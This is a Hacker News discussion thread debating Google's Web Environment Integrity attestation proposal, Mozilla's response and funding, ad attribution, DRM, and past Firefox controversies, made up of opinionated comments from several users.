If it's true that Google is mostly paying for antitrust avoidance and that something like Edge isn't a "competitor", Mozilla has substantial leverage. Mozilla just needs to be cheaper than an antitrust investigation and potential loss of that case. I would imagine that's not hard to do, that sounds expensive.
The pitch of modern advertising certainly seems to be 'more personalised ads are the only way to be effective'. And within that pitch, attribution is about finding out if the way an ad was personalized was indeed effective. But I am not sure I trust google and facebook when they claim "only personalized ads are effective".
I can't really recall any decisions made that were unpopular with existing users, but likely to lure new users in. Ads on new tabs doesn't seem like something that would bring new users in. Pocket doesn't either, since iirc you could install the extension in Chrome if you really wanted it.
Most of the controversies I remember were either to increase Mozilla's revenue, or boondoggles like their mobile OS. My major annoyance was that the increase in revenue seems like it was spent on boondoggles or weird, unrelated charity rather than going back into improving the browser.
I'm still also a Firefox user, but it's like 99% because ads are not their primary source of revenue rather than any remaining fondness towards Mozilla.
One option would potentially be to only allow positive assertions - ie: "You are up to date" not "you are not running this". TBH I think that would address a major concern for me.
Indeed
> what does that have to do with me or my private property? ... But the advertising platform has no business relationship with me
I am not convinced that you owe the advertising platform attribution. My original point was just that attribution is not about dragnet surveillance for personalizing ads. But I can try to argue why browsers should do attribution, just to interrogate the question.
Specifically, you have a business relation with whatever website you are going to that serves you ads. That website has a clear interest in helping their ad-platform attribute ads on their website. After all, that website depends on those ads for your income.
It is then within the perogative of that website to effectively say I only want to serve my website to users who will cooperate with attribution. This request is not a request for mass surveillance, because attribution is limited in what it reveals about a person. So this request could be construed as reasonable.
Given that websites have a reasonable standing to make these demands, it is reasonable for a user-agent to be able to accept these demands. Since otherwise the user for which the user-agent is acting cannot visit the website they requested the user-agent display. Of course a user-agent should let you opt out, but then websites are within their rights of refusing you access.
So far, so reasonable (or at least not completely unreasonable).
The sticking point is of-course that most website do want attribution, but don't want to block people with older browsers. So they want users to agree to give them the attribution data without giving the users anything in return. At which point a user-agent has no more business cooperating with attribution on behalf of the user.
In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.
a) SSO has no financial cost. Hardware keys do.
b) SSO has been implemented and standard for years and is trivial for sites to support, hardware keys are much newer and are still rarely supported for authentication.
c) You can use hardware keys with SSO, which I'd recommend, and now you've gotten the benefits of both.
If pissing me off after they've gotten $100 out of me means they get three other to spend $100, it's much more valuable than having me as a repeat customer. If someone found a way to triple my monthly spend but it made me miserable, said company would inevitably do it. Because if they don't, someone will come in, and eat them alive.
Advertising is purposefully inflicted misery, on all of us. The CEO of TF1, a french TV channel, called his job "selling available brain time to advertisers". That is all you are to them, whether we're talking about Coca Cola or Joe's Snoe and Foe: they want your money, because they die without it. Every company is a parasitic organism, and advertising is currently the most efficient way to spread.
However, dollars are fungible. If you donate $500 to support MDN, that may replace $500 for MDN coming from revenue, which frees up $500 to go into something else, like a C-Suite's pocket, or Pocket or whatever. So while your dollars go where you said, it still enables whatever you didn't like. OTOH, if you donate $50B to support MDN, that's a bit different; it certainly frees up whatever money was going to support MDN before, but there wasn't $50B of MDN expense, so the excess beyond the needs of MDN doesn't go anywhere.
[1] https://appleinsider.com/articles/12/07/25/apple_kills_windo...
I strongly disagree. Being disabled doesn't mean that you should be able to bypass the security of any system.
Also proposals like this help reduce the amount of captchas disabled users get meaning that they may have a better experience using the web if this proposal is accepted.
Mozilla has opposed Google many times, and is doing so again in the very link you are commenting on. Mozilla is not completely free from economic realities, but we are definitely not controlled by Google.
(Disclaimer: I'm working for Mozilla as an SRE.)
It's remembered now only by a very small, though vocal, minority.
I still think the approach is harmful overall.
The idea that I must be "vouched for" by a "trusted third party" by providing extensive details about my system, in order for my browser to send a HTTP request is in direct opposition to privacy and my interests.
That it's being proposed by a company that owes it's entire existence to web crawling is ironic.
It turns the web from an open platform into one where the big players have complete control over which devices and software are permitted.
* I can actually run Google Pay because the original SafetyNet API was software backed. So I can spoof a signature from an old device that didn't support hardware attestation. In particular my Pixel 4a claims to be a Nexus 5 so that Google's servers don't expect a hardware signature. But I'm sure that the clock is ticking until these apps (or Google globally) stop considering software backed validation acceptable. I'm quite sure that this Web Integrity API will be hardware backed from the start.
The solution is diversity and using browsers that respect users. Chrome only has the power to push this API because they own most of the market.
All valid concerns, but why post about them on the internet? Especially when it's nothing concrete--you used the words "questions", "doubts", and "might happen"? If someone is taking the effort to post FUD (literally) about Mozilla and "trust", why the hell aren't they using that same effort to post about Google or Microsoft and "trust"? Aren't those obviously much bigger problems?
Again, it's not wrong, per se, but I feel like it's bordering on some kind of astroturfing for people to complain about the fucking Mr. Robot non-story that happened years ago when TFA is about Mozilla at least signalling the right thing while Google is trying to be overtly evil YET AGAIN. I can actually type "Fuck Google" faster than I can type "Mr. Robot", so I'd have to have some kind of weird agenda or priorities to bring up Firefox's Mr. Robot thing.
But, also, bringing money in is proxy enough for being able to do "good" for whatever definition we'd like to use. So, money or users, I think my general point about compromising their ideals for pragmatism is still valid (not necessarily true or correct, but it's an argument that can potentially be made).
Just a nit, "...that website depends on those ads for their income," not mine.
But yes, you're correct. And I do, in fact, aggressively block ads and the trackers/spyware/malware that goes with them.
And website owners are well within their rights to block me from viewing their site if (when, actually) I refuse to view their ads -- a point I've made in perhaps a half-dozen comments here on HN just in the past 12 months or so.
And I'm fine with that. For exactly the same reasons I gave for not wanting anything to do with ads/trackers/spyware running on my private property -- a site is the website owner's private property and they should be able to "charge a cover fee" (i.e., require that I view ads) to view the content of that site.
But WEI doesn't change that dynamic even a little. Rather, it forces me to give up control of my private property and privacy whether I want to do so or not.
I'd add that the "benefit" here isn't giving website owners the option to block me if I don't wish to view the ads run on their site -- they can already do that without WEI. In fact, some sites already do so. The only "benefit" AFAICT is that the ad platforms would now have enormously more information (in that they can now track me everywhere with a cryptographic signature regardless of any steps I might take to protect my privacy) to validate ad impressions and reporting metrics for the advertisers.
The result is that website owners have the same capability they've always had, but now I'm forced to subsidize some of the richest companies in the world with my electricity, CPU cycles, data, network bandwidth, browsing history, and likely my PII.
That's what I object to.
>In that case, there remains an argument of "if we don't do attribution the entire web is worse off, so we solve the tragedy of the commons by 'making the right decision' in the defaults for the user-agent". But that argument is clearly unreasonable to me.
Yes, it is unreasonable. I take great pains (I never log in/create accounts on any Google properties, block trackers and "analytics," self-host my email and content I wish to share in the Internet, etc., etc., etc.) to maintain at least a semblance of privacy, which is already a time/cost sink for me.
And these rapacious scumbags want me to jump through more hoops and run their code on my systems just so they can charge advertisers more for shit I don't want anyway? I'll say it again: Fuck. That. Noise.
tl;dr: Websites can already (and I support their ability to do so) block me (or anyone else) who runs an ad blocker from viewing their site. As such, the only folks that will have new capabiliities/benefits from WEI are ad platforms and advertisers. With whom I have no relationship whatsoever and don't want their spyware to execute on my private property.
We don't have to be OK with it, but it seems inevitable that everything is just going to shit. Starting with smartphones. That's why my current smartphone will be my last one. The cost/benefit of them is no longer favorable.
I think that the web itself will be the next casualty.
There is no perfect option right now, and Mozilla will never be that perfect option because they are human and at least three people working there probably want to make some money.
So yeah, lets just keep making them irrelevant so in ten years I won't have a choice and be FORCED to use the browser that says ad blocking is stealing and spoofing your user agent is a violation of the CFAA and all this other blatantly user hostile shit.
It's such clear whataboutism, to have ANYTHING to hold against the only web browser that isn't actively controlled by the people with billions of dollars a year incentive to actually harm how you use the web.
"Firefox displayed a pop-up ad for Mozilla VPN over an unrelated page" (>>36077360 )
"Mozilla stops Firefox fullscreen VPN ads after user outrage" (>>36085642 )
That's another incident that just shouldn't have ever happened to begin with, in my opinion.
If you were selling a towel, you wouldn't put restrictions on someone wetting it and using it for hand to hand combat, would you?
And more directly yes I would want exactly what you're describing to be possible. We do this with alcohol so that rubbing alcohol can be sold at a reasonable price.
https://stackoverflow.com/questions/39533/how-to-identify-th...
I've used Firefox as my primary browser since it was Phoenix. Before that I used Netscape Communicator. It's not hard and I'm not missing out on anything.
Correct, but only in the sense that everyone should have the right to bypass attestation checks, not just disabled users.
> proposals like this help reduce the amount of captchas disabled users get
Citation needed. Chrome's implementation of this API ties directly in the Play Integrity API. I am skeptical that style of attestation will have any measurable impact on the ability to automate requests from an Android phone, and I am skeptical that websites will actually reduce captchas rather than just add attestation requirements alongside them.
Even if it did reduce captchas (which to be clear, it probably won't) disability accommodation should not be conditional. Low vision and low mobility users who run custom ROMs also deserve to access the web. If the level of captchas that are thrown in front of low vision users are problematic or inaccessible, that's a conversation we need to have about captchas more generally. It's not an excuse to restrict those users' autonomy over their computers.
But as it comes to the urgent matter of stopping this proposal in its tracks, switching browsers won't do it.
It requires other methods of immediate protest.
I don't think big websites will block every VM (especially since Microsoft has some kind of super secure browser implementation that uses virtualisation). You may need to make KVM fake HyperV, though.
They killed Weave (aka Sync 1.0; which was somewhat weird but simple enough to comprehend, reimplement and self-host), replacing it with an NIH-reeking over-engineered abomination that's the very antithesis of standard, open or public. Most people just ignored it as "that's Mozilla own infrastructure, they don't have to make it open, design it well, think of others, or anything else". I could not.
They tried to push a fundamentally flawed Persona/BrowserID standard that continued the trend to remove users from their "own" identities while claiming it's a pro-user pro-privacy move. I can see the logic, but I'm of firm opinion that it would've done more harm than good. I'm glad the project died without gaining any traction and WebAuthn (which has its issues, but where users are the source of their identities) took over. That's what BrowserID should've been, but Mozilla just went with the flow and refused or failed to fight for identity ownership.
It's things like those what made me regret using Firefox (but again, everything else is worse), not some home page sponsored links. That's where they stopped to differ from the rest for me. Mozilla used to be a beacon of doing things right even if it was challenging, fighting for a better web. And they became just another software company, that put their glorious past on all the ads (how they're so pro-everything good) while failing to live up to those high standards.
They had an user agent, but they butchered it and made it just a browser.
----
It's worth considering that the examples that come up over and over again when people try to defend this proposal are a strong reason to believe that Google is lying or being naive when it says that the proposal won't eventually impact extensions or the ability to inspect 3rd-party code.
Because OS-level restrictions that ignore extensions and runtime modifications to websites and scriptable browsers won't help with any of these problems. And if advocates are willing to so quickly say today, "there's LLM spam, so sure, lock down the OS", they are also going to say in the future, "there's still LLM spam, the problem is worse than ever, lock down the extensions."
If you believe that blocking bots justifies attacking user agency, there's no reason to stop at blocking users from rooting their phones. The actual impactful attacks on user agency for blocking bots would be to block website inspection and website modification.
I'm trying to figure out how to balance assuming the best and treating every comment as if it's an individual argument, while also not being completely naive to the fact that a nontrivial number of the people making these arguments are very often blatantly pro-DRM and are asking me to just pretend that they're not. It's definitely not everyone, but...
Sure, the analog loophole (or analog input loophole) will remain. But it's times more difficult than what is possible at this point in time.
> And if advocates are willing to so quickly say today, "there's LLM spam, so sure, lock down the OS", they are also going to say in the future, "there's still LLM spam, the problem is worse than ever, lock down the extensions."
There's always going to be spam, just like there's always going to be ways around DRM. The difficulty changes over time. Up to the person to decide if it's good or bad.
> If you believe that blocking bots justifies attacking user agency, there's no reason to stop at blocking users from rooting their phones.
Noone has stopped there, SafetyNet already does that.
I disagree, I don't think whether or not you can root your phone has any real impact on how hard it is to automate a request. I don't think this is the same as the analog loophole, I think it's going after a different area entirely from where most attacks are coming from.
> Noone has stopped there, SafetyNet already does that.
What I mean is that SafetyNet blocks custom ROMs, rooting, etc... and I'm seeing comments saying that's all that the spec is interested in, it's not going to target extensions or code inspection. I don't think there's any reason to be confident of that, I think it's very likely that this spec evolves to target browser extensions. Because I don't think blocking people from rooting their phones will make an observable difference in the amount of LLM spam that websites get.
I find device farms way harder to pull off than a bash curl script, to be honest.
> I think it's very likely that this spec evolves to target browser extensions.
Absolutely, it very literally tries to guarantee integrity.
> Because I don't think blocking people from rooting their phones will make an observable difference in the amount of LLM spam that websites get.
I do think it would reduce the amount of abuse that's not very sophisticated. If that's worth the rest...
They sell the attack to business partners like Netflix and Spotify.
Effectively, they are selling the end users' liberty (ability to run arbitrary software, including for example, a cracked ad-free version of the Spotify app) to those business partners.
In sales-speak, this is framed as "effective Digital Rights Management", with "Rights" meaning "copyright enforcement". Critically, DRM is not a viable methodology until you provide it this attack surface.
It's also worth noting that YouTube is one of those business partners, and both Android and YouTube are owned by the same corporation: Alphabet.
I feel like you're potentially overcomplicating that? What I'm getting at is that:
A) You can basically build the equivalent of a bash curl script pretty easily if individual browsers aren't blocked (which Google says it doesn't want to do, but... that's my point, they will). Guaranteeing OS integrity doesn't matter unless you go on to restrict which browsers can run and weed out the efficient headless browsers. If any headless browser gets attestation support (and I've had proponents try to tell me that headless browsers will be supported) then that's likely game over for attestation as a bot detector.
B) You can build mostly the equivalent of a bash curl script inside of a webextension (or honestly, not even, you can make requests in a loop automated within your browser's dev-tools). You don't need to leave the monitor or anything hooked up and you don't need to do anything particularly fancy and you don't need to emulate user input or build a complicated farm. Your web browser is a terminal with all of the capabilities of Bash and more.
My instinct is that any website that was vulnerable to a quick and easy bash script before is going to be just as vulnerable to a `for` loop run inside the browser dev tools.
----
It's tricky to talk about because the actual answer is what you say: ("absolutely, it very literally tries to guarantee integrity") -- that attestation will involve significantly more restrictions than proponents are pretending it will impose. But if I take the proponents at face value, and if I believe that this is about guaranteeing OS integrity and blocking root and it's not going to block headless browsers or extensions -- in that world I don't think this necessitates setting up a bunch of device farms? I think it just means you run Headless Chromium or Firefox, maybe with a remote debugger if you want to be fancy, and then you have it spam requests. Bear in mind that this will be on desktop as well; it's not only phones that would be sending attestation signals. Desktop Chromium and Firefox are incredibly easy to script.
Maybe it makes that slightly more expensive since you have to actually run a browser, but I don't think you need a rack of phones and I'm not sure that the compute cost of running a browser can be considered prohibitive? Maybe I'm underestimating the margin that bot farms operate at and forcing them to run a browser would be enough to drive some out of business. But I kind of suspect you just use one of the desktop browsers that has attestation and write your "bash" script equivalent inside of that browser and everything works mostly the same.
Am I missing something? It doesn't seem like that big of a deal whether or not you can use curl.
And the only real way to get around that is for some websites to turn off the ability to have the browser arbitrarily execute code with full access to browser/page APIs whenever the user hits F12.
What is does do, is afford the major players total control over which devices and individuals are allowed to access the web.
Relative to their current position of already owning the hardware?
> They sell the attack to business partners like Netflix and Spotify.
I don't see how they're "selling" anything. Web Integrity requires no money to change hands. If implemented, Netflix + Spotify would owe Google nothing.
Yes, in terms of buildings. But I see as many RedBox kiosks around as ever.
No fear, there.
No need for all that other things.
It's the lack of foresight and the lack of good judgment that I don't see getting fixed.
Both of those incidents should have been completely avoidable with even the most minimal of forethought.
I don't think that there's "a strong anti-Mozilla bias" here, as you put it earlier. The people affected by that incident, and by others, were probably among the most ardent Firefox supporters. After all, they were still using it long after so many others had already moved to Chrome.
Loss of trust is something that isn't easily forgotten, and it's a relevant factor worthy of bringing up in discussion.
> You may need to make KVM fake HyperV, though.
Not even techies are farting around with virtual machines and hoping their fake virtualization tricks don't break this weak when they have important things to do much less 99.999% of planet earth. They might however be willing to press one button that perceptively from the user standpoint switches their screen to a different desktop that happens to be running on a different machine. The interface to this feature would be simple enough they wouldn't have to care to understand it.
Users Mental Model: press button and "special" browser pops up full screen where I can bank/spend money. Press button again and it goes back whatever they were doing.
Were you expecting only responses of praise for Mozilla, that users have been heard on WEI and therefore everyone can move on? Mozilla has invested resources together with Meta into developing the IPA proposal that also prioritises the needs of advertisers over users. The problem that IPA seeks to solve is:
"Advertisers need accurate reporting about how their ad campaigns are performing. Currently, businesses use data about the people who viewed their ads and bought their products to determine ‘return on ad spend’. But the ecosystem is moving towards more privacy and less personal data sharing."[1]
"Detecting fraud and invalid traffic is a challenging problem that we're interested in helping address."
A further error of your framing is assuming WEI and IPA proposals can be meaningfully discussed in isolation of each other. With such framing, there is an avoidance of discussion of the combined impact of proposals if they were implemented together, or whether proposals such as IPA still make sense to pursue without WEI (or future equivalent proposal).
[1] https://docs.google.com/presentation/d/1NpQz0Wm73eEKw24V7B0y...
[2] https://www.rfc-editor.org/rfc/rfc8890.html
[3] https://www.w3.org/TR/design-principles/#priority-of-constit...
[4] https://www.w3.org/TR/ethical-web-principles/#control, https://www.w3.org/TR/ethical-web-principles/#multi, https://www.w3.org/TR/ethical-web-principles/#render
Having you spend money on a product you end up liking is positive for both parties of that transaction. Imagine it's a book you like, and you recommend it to others - who then buy it too to read it. Or a song you get others to hear. That's a happy customer of an arbitrary product. Does the author or artist know who you are personally? Of course not, but they didn't need to for them to care about their customers and make something that they enjoyed.
I suspect those are mostly different groups. And my personal take is that Mozilla did indeed make that calculation... and proceeded to sacrifice the die-hard core userbase in order to get wider appeal, but they managed to not actually get the wider audience to buy in either, leaving them with nothing.
If I could/had to pay/donate for it - I'd gladly do, but it's virtually impossible.
I know people want convenience. Anyone interested in convenience will just use Windows or macOS. They won't need to mess with VMs. This whole problem is only an issue for the small percentage of the population that wants to use their own weird operating systems, browsers, or addons.
If the need arises, someone will make a user friendly tool to do all this. Cassowary can do it today after following a step by step guide, they can also add their Web Integrity patches to those steps if they need to.
If you, as a user, want to have a special button that makes banking work without needing to know how or why, stick with proprietary operating systems. Linux isn't user friendly enough to accomplish this and it probably won't be for a while. The same is true if you want to watch your HD/4K streaming content without a huge struggle.
It's a non-story because you had to opt-in to Firefox's "experiments" feature to get the extension pushed to you. Opting in to the experiments feature is *literally* granting permission for Mozilla to change the behavior of your Firefox browser remotely in between official releases. So, Mozilla had your permission to change your browser. I simply will not shed a tear for anyone who felt betrayed by something they signed up for.
And, by the way, I was also "affected" by the Mr. Robot thing because I also opted in to the experiments feature.
Furthermore, the extension did nothing harmful. It didn't even collect any data as far as I know. You know why Mozilla pushed an extension that didn't even collect any data instead of one that does? Because they were acting in a trustworthy way!
Sure, it was a faux pax. Mozilla thought they could be cute the same way a lot of old school FLOSSy, hackery, software would include amusing Easter eggs and jokes. It was inappropriate and didn't land well for a variety of reasons, but there was no reason to lose trust in Mozilla at the time, and there's *certainly* no reason to even bring it up today, years later, when just about every other tech company and computer product is trying their damnedest to spy on you, sell your data, prevent you from having root control of your devices, and squeeze subscription money out of you.
Again, Chrome starts tracking you the instant you launch it for the first time. Microsoft tracks you when you log in to Windows and occasionally re-enables tracking features that you've disabled. Mozilla pushed a silly "fun" extension to users who opted in that didn't collect any data nor make Mozilla any money.
This discussion is nonsense. If you truly don't trust Mozilla after the harmless Mr. Robot extension was pushed to you after you chose to allow them to modify your browser remotely, then go ahead and stop using Firefox- I don't care. But please stop spreading FUD.
Has there ever been a case of an underdog company/product actually gaining market share by becoming less different than the market leader? It always seems like a mistake from the outside, to me. I feel like an underdog is more likely to succeed by actually being different and attracting people who would prefer those differences. Why would anyone change from what they're currently using to an alternative that is almost exactly the same?
So many people recommend it, but I've been iffy on using brave. Thanks for giving me a little insight on your choices and reasoning behind it.
That said, I think income from Firefox's default search engine pretty much dwarfs any income that could potentially be gained from donations/buy-to-support.
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
- antitrust@ftc.gov
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
- comp-greffe-antitrust@ec.europa.eu
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
- general.enquiries@cma.gov.uk
India:
- https://www.cci.gov.in/antitrust/
- https://www.cci.gov.in/filing/atd
Canada:
- https://www.competitionbureau.gc.ca/eic/site/cb-bc.nsf/frm-e...
I agree that it convenient to be able to see each ad information, but that doesn't mean that it should be this way.
DRM is the tool that guarantees money will change hands. Without it, there is nothing but a social (legal) threat to prevent people copying and distributing copyrighted content for free.
Forcing users to run the DRM-infected version of an app creates an incentive for Netflix and Spotify to participate on the Android platform; which in turn strengthens Android's position, and the Google Play Store as a market.
This incentive goes both ways for YouTube, because it is owned by Alphabet.
> If implemented, Netflix + Spotify would owe Google nothing.
Yes, but that's not the point. Google wants Netflix and Spotify to have Android apps. Netflix and Spotify want DRM infecting their apps. Without this system in place, users can disinfect the Spotify app, and listen to music without paying Spotify money (or watching ads to pay them indirectly).
Without providing the environment for functional DRM, Netflix and Spotify can simply refuse to make Android apps. That would be a pretty weak threat, except that YouTube wants the same thing; and that incentivizes Android to play ball.
Those apps already exist. Don't you think that kind of undermines your entire point?